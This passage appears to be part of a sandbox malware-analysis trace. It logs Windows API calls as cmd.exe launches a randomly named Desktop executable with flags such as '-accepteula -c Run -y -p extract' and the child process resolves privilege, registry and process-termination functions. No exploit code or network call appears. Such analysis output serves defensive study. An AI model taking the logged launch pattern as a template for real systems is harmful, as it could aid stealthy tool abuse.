[0234.371] _wcsicmp (_String1="tdq963ii.exe", _String2="POPD") returned 4 [0234.371] _wcsicmp (_String1="tdq963ii.exe", _String2="ASSOC") returned 19 [0234.371] _wcsicmp (_String1="tdq963ii.exe", _String2="FTYPE") returned 14 [0234.371] _wcsicmp (_String1="tdq963ii.exe", _String2="BREAK") returned 18 [0234.371] _wcsicmp (_String1="tdq963ii.exe", _String2="COLOR") returned 17 [0234.371] _wcsicmp (_String1="tdq963ii.exe", _String2="MKLINK") returned 7 [0234.371] _wcsicmp (_String1="tdq963ii.exe", _String2="FOR") returned 14 [0234.371] _wcsicmp (_String1="tdq963ii.exe", _String2="IF") returned 11 [0234.371] _wcsicmp (_String1="tdq963ii.exe", _String2="REM") returned 2 [0234.372] GetProcessHeap () returned 0x530000 [0234.372] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x210) returned 0x542488 [0234.372] GetProcessHeap () returned 0x530000 [0234.372] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x72) returned 0x548fb8 [0234.372] _wcsnicmp (_String1="tdq9", _String2="cmd ", _MaxCount=0x4) returned 17 [0234.820] GetProcessHeap () returned 0x530000 [0234.820] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x418) returned 0x5426a0 [0234.820] SetErrorMode (uMode=0x0) returned 0x0 [0234.820] SetErrorMode (uMode=0x1) returned 0x0 [0234.820] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x5426a8, lpFilePart=0x1eef08 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1eef08*="Desktop") returned 0x25 [0234.820] SetErrorMode (uMode=0x0) returned 0x1 [0234.821] GetProcessHeap () returned 0x530000 [0234.821] RtlReAllocateHeap (Heap=0x530000, Flags=0x0, Ptr=0x5426a0, Size=0x6e) returned 0x5426a0 [0234.821] GetProcessHeap () returned 0x530000 [0234.821] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x5426a0) returned 0x6e [0234.821] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0234.821] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0234.821] GetProcessHeap () returned 0x530000 [0234.821] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x120) returned 0x542718 [0234.821] GetProcessHeap () returned 0x530000 [0234.821] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x238) returned 0x542840 [0234.833] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0234.833] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", fInfoLevelId=0x1, lpFindFileData=0x1eeca4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eeca4) returned 0x5429f0 [0234.834] GetProcessHeap () returned 0x530000 [0234.834] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x14) returned 0x542a30 [0234.834] FindClose (in: hFindFile=0x5429f0 | out: hFindFile=0x5429f0) returned 1 [0234.834] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0234.834] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0234.834] GetConsoleTitleW (in: lpConsoleTitle=0x1ef17c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.835] InitializeProcThreadAttributeList (in: lpAttributeList=0x1ef004, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1ef0cc | out: lpAttributeList=0x1ef004, lpSize=0x1ef0cc) returned 1 [0234.835] UpdateProcThreadAttribute (in: lpAttributeList=0x1ef004, dwFlags=0x0, Attribute=0x60001, lpValue=0x1ef0c4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1ef004, lpPreviousValue=0x0) returned 1 [0234.835] GetStartupInfoW (in: lpStartupInfo=0x1eefc0 | out: lpStartupInfo=0x1eefc0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x3, hStdOutput=0x80, hStdError=0xb)) [0234.835] lstrcmpW (lpString1="\\tdq963ii.exe", lpString2="\\XCOPY.EXE") returned -1 [0234.837] CreateProcessW (in: lpApplicationName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", lpCommandLine="tdq963ii.exe -accepteula \"jnwmon.dll.mui\" -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1ef060*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula \"jnwmon.dll.mui\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1ef0ac | out: lpCommandLine="tdq963ii.exe -accepteula \"jnwmon.dll.mui\" -nobanner", lpProcessInformation=0x1ef0ac*(hProcess=0x78, hThread=0x74, dwProcessId=0x320, dwThreadId=0xa18)) returned 1 [0235.743] CloseHandle (hObject=0x74) returned 1 [0235.743] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0235.743] GetProcessHeap () returned 0x530000 [0235.744] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x542d70 | out: hHeap=0x530000) returned 1 [0235.744] GetEnvironmentStringsW () returned 0x542c90* [0235.744] GetProcessHeap () returned 0x530000 [0235.744] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb84) returned 0x54af20 [0235.744] FreeEnvironmentStringsW (penv=0x542c90) returned 1 [0235.744] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0238.382] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x1eefa0 | out: lpExitCode=0x1eefa0*=0x1) returned 1 [0238.382] CloseHandle (hObject=0x78) returned 1 [0238.382] _vsnwprintf (in: _Buffer=0x1ef0e8, _BufferCount=0x13, _Format="%08X", _ArgList=0x1eefac | out: _Buffer="00000001") returned 8 [0238.382] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0238.382] GetProcessHeap () returned 0x530000 [0238.382] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x54af20 | out: hHeap=0x530000) returned 1 [0238.382] GetEnvironmentStringsW () returned 0x542c90* [0238.383] GetProcessHeap () returned 0x530000 [0238.383] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb84) returned 0x54af20 [0238.383] FreeEnvironmentStringsW (penv=0x542c90) returned 1 [0238.383] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0238.383] GetProcessHeap () returned 0x530000 [0238.383] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x54af20 | out: hHeap=0x530000) returned 1 [0238.383] GetEnvironmentStringsW () returned 0x542c90* [0238.383] GetProcessHeap () returned 0x530000 [0238.383] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb84) returned 0x54af20 [0238.383] FreeEnvironmentStringsW (penv=0x542c90) returned 1 [0238.383] GetProcessHeap () returned 0x530000 [0238.383] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5400d0 | out: hHeap=0x530000) returned 1 [0238.383] DeleteProcThreadAttributeList (in: lpAttributeList=0x1ef004 | out: lpAttributeList=0x1ef004) [0238.383] _get_osfhandle (_FileHandle=1) returned 0x80 [0238.383] SetConsoleMode (hConsoleHandle=0x80, dwMode=0x0) returned 0 [0238.383] _get_osfhandle (_FileHandle=1) returned 0x80 [0238.383] GetConsoleMode (in: hConsoleHandle=0x80, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 0 [0238.383] _get_osfhandle (_FileHandle=0) returned 0x3 [0238.383] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0238.384] SetConsoleInputExeNameW () returned 0x1 [0238.384] GetConsoleOutputCP () returned 0x1b5 [0238.384] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0238.384] SetThreadUILanguage (LangId=0x0) returned 0x409 [0238.384] exit (_Code=1) Process: id = "252" image_name = "tdq963ii.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe" page_root = "0x16145000" os_pid = "0x570" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "201" os_parent_pid = "0x7d8" cmd_line = "tdq963ii.exe -accepteula -c Run -y -p extract -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 859 os_tid = 0x3f8 [0237.349] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0237.349] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0237.350] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0237.350] GetProcAddress (hModule=0x76d30000, lpProcName="DeviceIoControl") returned 0x76d4322f [0237.350] GetProcAddress (hModule=0x76d30000, lpProcName="DuplicateHandle") returned 0x76d41886 [0237.350] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0237.351] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0237.351] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0237.351] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0237.351] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0237.351] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0237.352] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0237.675] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadErrorMode") returned 0x76dbaf42 [0237.675] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0237.676] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0237.676] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0237.676] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateThread") returned 0x76d47a2f [0237.676] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0237.676] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0237.676] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0237.677] GetProcAddress (hModule=0x76d30000, lpProcName="FindResourceW") returned 0x76d45971 [0237.677] GetProcAddress (hModule=0x76d30000, lpProcName="SizeofResource") returned 0x76d45ac9 [0237.677] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0237.677] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0237.677] GetProcAddress (hModule=0x76d30000, lpProcName="LoadResource") returned 0x76d4594c [0237.678] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0237.678] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0237.678] GetProcAddress (hModule=0x76d30000, lpProcName="LockResource") returned 0x76d45959 [0237.678] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0237.678] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0237.678] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0237.679] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0237.679] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0237.679] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0237.679] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0237.679] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0237.680] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleScreenBufferInfo") returned 0x76d6bafd [0237.680] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0237.680] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0237.680] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0237.680] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0237.680] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0237.680] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0237.681] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0237.681] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0237.681] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0237.681] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0237.681] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0237.681] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0237.681] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0237.682] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0237.682] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0237.682] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0237.682] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0237.682] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0237.682] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0237.683] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0237.683] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0237.683] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0237.683] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0237.683] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0237.683] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0237.683] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0237.684] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0237.684] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0237.684] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0237.684] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0237.684] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0237.684] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0237.684] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0237.685] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0237.685] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0237.685] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0237.685] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0237.685] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0237.685] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0237.685] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0237.686] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0237.686] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0237.686] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0237.686] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0237.686] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0237.687] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0237.687] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0237.687] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0237.687] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0237.687] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0237.688] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0237.688] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0237.688] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0237.688] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0237.688] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0237.689] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteKeyW") returned 0x77721272 [0237.689] GetProcAddress (hModule=0x77710000, lpProcName="LookupPrivilegeValueW") returned 0x777241b3 [0237.689] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0237.689] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0237.689] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0237.690] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0237.690] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0237.690] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0237.690] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyW") returned 0x77721514 [0237.690] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0237.691] GetProcAddress (hModule=0x77710000, lpProcName="LookupAccountSidW") returned 0x77724874 [0237.691] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x77270000 [0237.691] GetProcAddress (hModule=0x77270000, lpProcName="PrintDlgW") returned 0x772733a3 [0237.691] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0237.692] GetProcAddress (hModule=0x770a0000, lpProcName="StartPage") returned 0x770e401a [0237.692] GetProcAddress (hModule=0x770a0000, lpProcName="EndDoc") returned 0x770e3f29 [0237.692] GetProcAddress (hModule=0x770a0000, lpProcName="StartDocW") returned 0x770e4c51 [0237.692] GetProcAddress (hModule=0x770a0000, lpProcName="SetMapMode") returned 0x770bb02f [0237.693] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0237.693] GetProcAddress (hModule=0x770a0000, lpProcName="EndPage") returned 0x770c6bde [0237.693] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0237.693] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0237.693] GetProcAddress (hModule=0x77130000, lpProcName="DialogBoxIndirectParamW") returned 0x7716cbf3 [0237.694] GetProcAddress (hModule=0x77130000, lpProcName="EndDialog") returned 0x7716b99c [0237.694] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0237.694] GetProcAddress (hModule=0x77130000, lpProcName="InflateRect") returned 0x77153309 [0237.694] GetProcAddress (hModule=0x77130000, lpProcName="GetSysColorBrush") returned 0x771535a4 [0237.694] GetProcAddress (hModule=0x77130000, lpProcName="SetCursor") returned 0x771541f6 [0237.695] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowTextW") returned 0x771520ec [0237.695] GetProcAddress (hModule=0x77130000, lpProcName="GetDlgItem") returned 0x7716f1ba [0237.695] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x75440000 [0237.696] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoW") returned 0x754419f4 [0237.696] GetProcAddress (hModule=0x75440000, lpProcName="VerQueryValueW") returned 0x75441b51 [0237.696] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoSizeW") returned 0x754419d9 [0237.696] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0237.698] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0237.698] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x43962ec0, dwHighDateTime=0x1d68287)) [0237.698] GetCurrentThreadId () returned 0x3f8 [0237.698] GetCurrentProcessId () returned 0x570 [0237.698] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=35803710766) returned 1 [0237.698] GetProcessHeap () returned 0x530000 [0237.699] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0237.699] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0237.699] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0237.699] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0237.700] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0237.700] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0237.700] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0237.700] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0237.700] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0237.701] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0237.701] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0237.701] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0237.701] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0237.702] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0237.702] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0237.702] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0237.702] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0237.702] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0237.702] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0237.703] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0237.703] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0237.703] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0237.703] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0237.703] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0237.704] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0237.704] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0237.704] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0237.704] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0237.704] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0237.704] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0237.705] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0237.705] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0237.705] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0237.705] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0237.707] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x3bc) returned 0x5470a0 [0237.707] GetCurrentThreadId () returned 0x3f8 [0237.707] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x547468 [0237.707] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x800) returned 0x547488 [0237.707] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0x1451ef55, hStdError=0x0)) [0237.707] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0237.707] GetFileType (hFile=0x3) returned 0x2 [0237.739] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0237.739] GetFileType (hFile=0x7) returned 0x2 [0237.740] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0237.740] GetFileType (hFile=0xb) returned 0x2 [0237.740] GetCommandLineW () returned="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner" [0237.740] GetEnvironmentStringsW () returned 0x547c90* [0237.740] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xb88) returned 0x548820 [0237.741] FreeEnvironmentStringsW (penv=0x547c90) returned 1 [0237.741] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0237.741] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x94) returned 0x547c90 [0237.741] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xa0) returned 0x547d30 [0237.741] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x3e) returned 0x544dd0 [0237.741] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x6c) returned 0x547dd8 [0237.741] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x6e) returned 0x547e50 [0237.741] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x78) returned 0x53f900 [0237.741] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, 